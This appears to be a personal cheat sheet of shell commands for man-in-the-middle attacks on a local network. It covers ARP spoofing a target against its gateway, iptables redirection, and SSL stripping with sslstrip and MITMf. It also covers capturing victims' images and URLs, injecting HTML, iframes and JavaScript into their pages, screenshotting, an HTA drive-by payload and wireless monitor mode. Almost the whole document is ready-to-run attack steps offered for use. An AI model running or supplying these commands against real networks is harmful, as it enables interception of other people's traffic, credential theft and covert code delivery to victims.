
#############################
#  hack sslstrip
#############################

https://www.youtube.com/watch?v=OoiYJUHF8bo
https://www.youtube.com/watch?v=NjNRzJV8Rvo

1) echo 1 > /proc/sys/net/ipv4/ip_forward
2) iptables -P FORWARD ACCEPT
3) iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
   (No require) iptables -I INPUT 1 -p tcp --dport 8080 -j ACCEPT
4) arpspoof -i wlp3s0 -t 192.168.3.133 -r 192.168.3.1
   			 (target ip)      (gateway)
5) sslstrip -l 8080
6) tail -f sslstrip.log

7) Capture images
       driftnet -i wlp3s0
8) Capture request urls 
       urlsnarf -i wlp3s0


#############################
# mitmf
#############################
1) iptables -P FORWARD ACCEPT
2) /etc/mitmf/mitmf.conf (change 53 to 5300 for dns port conflict)
3)mitmf --spoof --arp -i eth0 --target 192.168.3.133 --gateway 192.168.3.1 -k --hsts
    -k : kill current login sesson
    --hsts: Enables SSLstrip+ for partial HSTS bypass.

# SSLstrip
mitmf --spoof --arp -i eth0 --target 192.168.3.133 --gateway 192.168.3.1 -k --hsts

# inject HTML file as Iframe
mitmf --spoof --arp -i eth0 --target 192.168.3.133 --gateway 192.168.3.1 -k --hsts --inject --html-file /path/to/index.html

# inject HTML url as Iframe
mitmf --spoof --arp -i eth0 --target 192.168.3.133 --gateway 192.168.3.1 -k --hsts --inject --html-url http://www.somesite.com

# inject js file 
mitmf --spoof --arp -i enp2s0 --target 192.168.3.133 --gateway 192.168.3.1 -k --hsts --inject --js-file /root/test.js

# screen shoot
mitmf --spoof --arp -i wlp3s0 --screen --interval 5 --target 192.168.3.133 --gateway 192.168.3.1

# replace images
mitmf --spoof --arp -i enp2s0 --target 192.168.3.133 --gateway 192.168.3.1 --imgrand --img-dir /app/Pictures/wallpaper/

# replace HTA Drive-By
mitmf --spoof --arp -i eth0 --target 192.168.3.133 --gateway 192.168.3.1 -k --hsts --hta

#############################
#  todo sslstrip2
#############################
https://www.youtube.com/watch?v=9RPCSVcCv1w
https://github.com/byt3bl33d3r/MITMf/wiki/Installation
============
// download 
https://github.com/LeonardoNve/sslstrip2
https://github.com/LeonardoNve/dns2proxy
https://github.com/byt3bl33d3r/MITMf

//install
apt-get install python-pip
apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file
git clone https://github.com/byt3bl33d3r/MITMf
cd MITMf && git submodule init && git submodule update --recursive

// iptables
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53



#############################
# AirDump
#############################
$> sudo ifconfig wlan0 down
$> sudo iwconfig wlan0 mode monitor
$> sudo ifconfig wlan0 up
$> sudo aireplay-ng wlan0
